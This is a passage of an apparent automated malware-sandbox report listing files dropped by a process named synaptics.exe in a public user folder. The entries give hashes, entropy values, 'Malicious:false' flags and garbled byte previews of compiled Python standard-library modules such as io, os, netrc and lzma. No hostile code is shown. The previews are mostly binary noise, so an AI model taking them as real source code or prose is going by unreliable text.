                                                                                                                                                                                                                                  SSDEEP:48:7jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGnvPOcGcMzzMfSd:7UK0iSxOmoWF2vLAy/hyvP7GcmYa7RXn
                                                                                                                                                                                                                                  MD5:8C59BC5474F13E004265B60E1733BF90
                                                                                                                                                                                                                                  SHA1:118F2B06DF232081934CB2F8C094FA5D8E76569C
                                                                                                                                                                                                                                  SHA-256:8DFD78C904728EE31476A109CCA6A8DEA5870E7C5DD46740880293DDCA502F51
                                                                                                                                                                                                                                  SHA-512:355F3FFF44074A03047B3A2EAB2A429071855003ED4866FEA562525657A04C9D3FE418796E4DF4CFFE778F653C367445B7C62190041CAD036A51065D486FF467
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61462
                                                                                                                                                                                                                                  Entropy (8bit):5.306612444561431
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:1kqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:BamjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                                                  MD5:F3772A341BB874C24D71EDB76D6FCBAD
                                                                                                                                                                                                                                  SHA1:D662817A4AC74F774CC73C706F99339812AE4216
                                                                                                                                                                                                                                  SHA-256:351A1AE96F446050ED3A2EF6789387E31AD6C083018AD48FB2D6EB07A03675BD
                                                                                                                                                                                                                                  SHA-512:EC81CE7F0152EBA4F00636EEAF63ABA2BCD0F156E9D85C407E6864E40BD13574428A533016FD68EB6825A018B48CFAB4946E05FA6989AA5286CB66515454CB0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....+C:\Users\Public\M20EKMMEH2\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c..................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):938
                                                                                                                                                                                                                                  Entropy (8bit):5.417023053262535
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:TBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB6R/k++Yu:TzVu8wzVmxcZt0bJB65h+N
                                                                                                                                                                                                                                  MD5:489E9FEB01DE83CBC8AC603C45C2571B
                                                                                                                                                                                                                                  SHA1:A28C29677A3250B97C48C570795665E3BF05B157
                                                                                                                                                                                                                                  SHA-256:D09EBD262D872B6428ED49448CBBDCFFB7BA1AEC6D39150A33A0F611A7F92A56
                                                                                                                                                                                                                                  SHA-512:39284EC168A43362944F021CD2676719894F6D42FFF6E6EC8F0391BF9D3677820506E2471A1FA6680C6699A3FFC26FF781A540CB6BD7D79431C57F71FEA2D52F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.breakZ.classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....)C:\Users\Public\M20EKMMEH2\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4153
                                                                                                                                                                                                                                  Entropy (8bit):5.325976983701888
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:0Z1XUppmx0pYUG0wzU182wl91Tc7mh5JFxy8:4+yN10wz5lTTc7mh51
                                                                                                                                                                                                                                  MD5:251E6144F6225E61AB9C0DC504D42FFB
                                                                                                                                                                                                                                  SHA1:19D623667CF7025BD9D38502BD483701089019C2
                                                                                                                                                                                                                                  SHA-256:4588D684081FD219E064D0824A2B2D3A11E6DE46EB347E17848A84AF154D429D
                                                                                                                                                                                                                                  SHA-512:6C1E812132451F10A95F46665E62DA13E4F105E9A9A19370A3C0C9E8B14B5EC399C80BFB78755A5C0C75A3780039C60F08A492EABB6BC3BA83A82619A187B13A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....+C:\Users\Public\M20EKMMEH2\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y(......t.....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46176
                                                                                                                                                                                                                                  Entropy (8bit):6.062520624013252
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:45YArctd0pztzQUB04zzRYKJFSd6tm2Ya4L+P9cLjYp:I1YdGzbB04zVYAFU6BYa4aPuL8p
                                                                                                                                                                                                                                  MD5:25D1FD08228026FFC062074AA2E7B2D0
                                                                                                                                                                                                                                  SHA1:8B78BF907C9F3EAA88EEF3FD0ABA4B12F408785C
                                                                                                                                                                                                                                  SHA-256:90E739B9247797C20CA7A0818B0FDC11CE721795854E315A28F5CDE8B0B8721D
                                                                                                                                                                                                                                  SHA-512:EC7F409CA1BF2929E685CB0F615EACC4E75DEBEB5F4F03AF64931911E0CAB03D20B53C411BFDE88A8E0FA71D310CB28EA20BE3768ECD6FD12B4B8F05AA73809A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12111
                                                                                                                                                                                                                                  Entropy (8bit):5.377256280597247
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:d+KxmTkRLMC//oLaizJHTWAztIvowudjKauXTsmNDGnA:TmaCzJHbKLXTsmpGnA
                                                                                                                                                                                                                                  MD5:516354D107787183E2A487CF252A3F39
                                                                                                                                                                                                                                  SHA1:C1453AA52CE4171EC32B6F7CA954C4A2CFC03AE7
                                                                                                                                                                                                                                  SHA-256:95729BB2BEB8E0B29D7D9D0AC5D655BF8276D7EA355E602EBC40AAB6FCE6BBCD
                                                                                                                                                                                                                                  SHA-512:AEA6D6B374DCFB4B33CD2FC601E16D22E0F451689911C02A119F7EDCD39BCE4B96CB431E0F878DABC48B38464F49A74269EBE47C278A937E3131CD576BFBE3A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWN..FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONE..FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17630
                                                                                                                                                                                                                                  Entropy (8bit):5.67574660132257
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:mNMcSuUoeg6rHVMN9yByEWG6D+nTF+jZjB77Hb930:mCzgWMEWp4+jZjJ930
                                                                                                                                                                                                                                  MD5:79CE3DF63F8C92B8B438E4CB36726F1E
                                                                                                                                                                                                                                  SHA1:75D931A512ECD3B29E7BFB24ABA52F3359B783C4
                                                                                                                                                                                                                                  SHA-256:404FD41FC7164A56151089D9C708E267F14CFECD05684A11D72DAE0279BC81B9
                                                                                                                                                                                                                                  SHA-512:6DB8515EA154C41F3FBF04394CD2418BEE70E901F5B60FE04C753966F0C79A00A44D8AE8BE6F6055720CF11D8654355075574CF91AF8F27A96474F2BBF42CCB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3944
                                                                                                                                                                                                                                  Entropy (8bit):5.483170285622825
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:88lMqPqiKqqHW7Nd5pqKHQwmHv35UqyhWqgv0+USVqtnqqgqhy:88pPq/qq27NVqKleeqdq8LvVqtnqqgqU
                                                                                                                                                                                                                                  MD5:97C789E0F7EBDA6F4207983900A26973
                                                                                                                                                                                                                                  SHA1:13B21FFD07C3601E69A78D14CA9729B34C9044AA
                                                                                                                                                                                                                                  SHA-256:328C37533BB56787B48D031E36AA1F981956C20338FB3DE130388DE019F89C72
                                                                                                                                                                                                                                  SHA-512:01CE7295ECB8B737789244622EEC7AF8D65F65912BC08C3FB543F9E7B1A6FFFCF5D826C758457DEA353C65C81BC520A3A15081D8EA9F1CD5A63B41195C4CF8DB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....'C:\Users\Public\M20EKMMEH2\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i.|._.i.|._.z"
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15314
                                                                                                                                                                                                                                  Entropy (8bit):5.433017311527072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:H7Ur8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:ora/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                                                  MD5:C0A4E0991B1F6C856296348792E54765
                                                                                                                                                                                                                                  SHA1:F02E08B98307535E7F2DF7985D343A276E7D31EE
                                                                                                                                                                                                                                  SHA-256:82F36A334ECEACFE2601A1307C6D0CE349E2345D83D0ED01759542C35ACFD4D7
                                                                                                                                                                                                                                  SHA-512:8D3AFF586CE4099B30572A5CC845E7DCD99E937A8B3C1484E736F41538FE71D8572A82631BD02D55A2610A3C5087BBB47C47003098EAFC085892DECA4AAE42E9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1758
                                                                                                                                                                                                                                  Entropy (8bit):5.541681650403075
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:k5kKoXsYZMmrK2E9zp8ItqhhhUIuoLpP0I2GIikGmObMn:khov2OOqhDaodpkwbMn
                                                                                                                                                                                                                                  MD5:AAAE9696BDF66B25DADF115962DB8422
                                                                                                                                                                                                                                  SHA1:9E44960600E4B99DCA5672533CD434ADE37401ED
                                                                                                                                                                                                                                  SHA-256:968D481E57DD2B25450D468097D5EF815778FAB3B36EDADE62FD9F2DA2BFF1FD
                                                                                                                                                                                                                                  SHA-512:F24A315AE470CF21B6821206305B68B5D79832B1CB3A75D0E85FC5CFC62F511456590953BBB0E6E96201BEE057078E7B5D35E5037A31F2D23C32B667CA86B7A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r.....,C:\Users\Public\M20EKMMEH2\lib\nturl2path.py..url2pathname....s*.............................................r....c....................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13519
                                                                                                                                                                                                                                  Entropy (8bit):4.846438578166959
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+25I4L+HVe0C1/u2/DqnsvQgZ2CsiIKoVkDq01iYL5ADAzi8Lq4UZfm:N5seTs2rwejZ2CoKo4iY9cA+8LAfm
                                                                                                                                                                                                                                  MD5:D8A0777F68D1E82960684B14E30B0675
                                                                                                                                                                                                                                  SHA1:A0D6FE4CED0279757F6C2725F8BC5BB7FFB1268B
                                                                                                                                                                                                                                  SHA-256:3BB2E6F5DB15752E7182497E8869B7D8C9EA7C2E5441910612996A1FFE04C2E3
                                                                                                                                                                                                                                  SHA-512:B02E78CD5988885258671564FF8489A14C952A53F4A1EB705D0164AEC45A6AF72C057157CD22CC37C98EC281AB48C976E089BF06A98B2E7E7AEBDE01F91EB49C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31610
                                                                                                                                                                                                                                  Entropy (8bit):5.452462066894043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:mZz4T1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:fbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                                                  MD5:D69C5A40F3004BE9EC326B399CF91043
                                                                                                                                                                                                                                  SHA1:A29AF7B69B887A399336B88C25337342C8A7E467
                                                                                                                                                                                                                                  SHA-256:670811E4234D28483AA76A53F9BD8B8006EF67DE5363763D74FAE53BD912C440
                                                                                                                                                                                                                                  SHA-512:733E1C11E70D9A46154F517113E2AF8A98B546C2106B47609D307CE818F92C2F98D4E7E39790B2054687DBB54061934B95C6FF35732D14C3F389BD2C1915B789
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):42063
                                                                                                                                                                                                                                  Entropy (8bit):5.238779347208194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:e9HqwOu28a8BgsMwiT3iWOhVECkoB3RDwgU46Jr8Dybx4YC5UPbmHMx2+64qvWLo:SKwOu2QLMweUhVECkoB3REz4uPx25UjY
                                                                                                                                                                                                                                  MD5:A582097169AFA16E1DE3931C48F9078C
                                                                                                                                                                                                                                  SHA1:983D5D66C9A7B09A3DB80B0BD8BBF325997C9A66
                                                                                                                                                                                                                                  SHA-256:CE88F31EE37C81361114CCA4367F511F002BFDAD65C7EF0F47BF14F14441D805
                                                                                                                                                                                                                                  SHA-512:BC525C85454AF298E3B05C4EF4A18EB4638D63F10039FEEAFA496D8A52143E5F701C83586BA494F44529B56EE43DC9FD088EBB90EFB9CC545F7ACB7F1B9A5B38
                                                                                                                                                                                                                                  Malicious:false
